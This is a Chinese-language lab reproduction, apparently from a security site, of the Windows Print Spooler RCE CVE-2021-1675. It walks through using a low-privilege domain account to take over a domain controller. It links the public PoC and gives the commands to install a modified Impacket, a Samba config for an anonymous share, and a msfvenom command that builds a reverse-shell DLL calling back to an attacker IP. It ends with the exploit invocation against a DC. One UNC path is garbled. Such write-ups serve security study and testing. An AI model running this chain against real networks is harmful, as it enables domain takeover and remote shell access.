CVE-2021-1675 Windows Spooler Service RCE复现 – 作者:Escapeee

一、漏洞Poc

https://github.com/cube0x0/CVE-2021-1675

二、环境配置

1、添加一个普通的域用户

漏洞的使用就是当你在渗透时拥有了一个普通的域成员,可以利用此漏洞去攻击域控,执行命令,直接拿下域控

image-20210703111800644

这里涉及到符号转义问题,只做复现密码随便来一个Passw0rd

image-20210703112013322

2、检查Spooler是否开启(默认开启)

这个肯定是默认开启的,不开启这个功能就无法实现打印

Spooler打印功能,会加载dll文件,通过进程树查看,可以看到是system权限,因为spoolsv.exe是x64的,所以生成的dll也得是x64

image-20210703112538655

三、复现

1、在运行漏洞利用之前,需要安装作者的 Impacket 包

pip3 uninstall impacket

git clone https://github.com/cube0x0/impacket

cd impacket

python3 ./setup.py install

这里就不演示了,复制粘贴命令即可

2、开启匿名访问smb

2.1、修改/etc/samba/smb.conf

这里使用原作者的不行(反正我不行)……就用自己了

[global]
workgroup = workgroup
server string = test
netbios name = MZ
security = user
map to guest = Bad User
smb ports = 445
log file = /var/log/samba/log.%m
max log size = 5

[smb]
comment = Samba
browseable = yes
writeable = yes
public = yes
path = /tmp/
read only = no
guest ok = yes

image-20210703113245223

2.2、实际测试下

image-20210703113721565

可以访问smb目录即可,这里的smb就是/tmp

image-20210703113752310

2.3、可能存在的问题

2.3.1、如果报错error什么0x5的,就是无法匿名访问

2.3.2、如果在windows里操作,访问smb,提示什么权限这样那样的,那你就要注意路径的权限问题

3、MSF生成木马,CS也一样,开启监听

3.1、在tmp目录下生成.dll木马

msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.128 lport=6666 -f dll -o reverse.dll

image-20210703114233226

3.2、开启监听

image-20210703114829370

4、利用Poc

4.1、看下帮助文档

python3 CVE-2021-1675.py -h

图片[9]-CVE-2021-1675 Windows Spooler Service RCE复现 – 作者:Escapeee-安全小百科

4.2、构造POC利用

python3 CVE-2021-1675.py 普通域用户:域用户密码@DC的IP地址 '开启的匿名访问'

python3 CVE-2021-1675.py oa:[email protected] '\10.10.10.128smbreverse.dll'

image-20210703115110653

乱码可以使用下面命令解决

chcp 65001

来源:freebuf.com 2021-07-04 12:00:46 by: Escapeee

相关推荐: Duo的双因素验证绕过 – 作者:大学新生Bai

本文为翻译文章,受个人知识所限部分内容可能存在偏差或曲解。原文链接:https://sensepost.com/blog/2021/duo-two-factor-authentication-bypass/前期准备工作作为我们为客户进行评估准备工作的一部分,我…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论